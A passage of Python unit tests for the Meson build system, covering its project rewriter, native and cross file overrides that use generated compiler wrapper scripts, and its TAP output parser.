'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
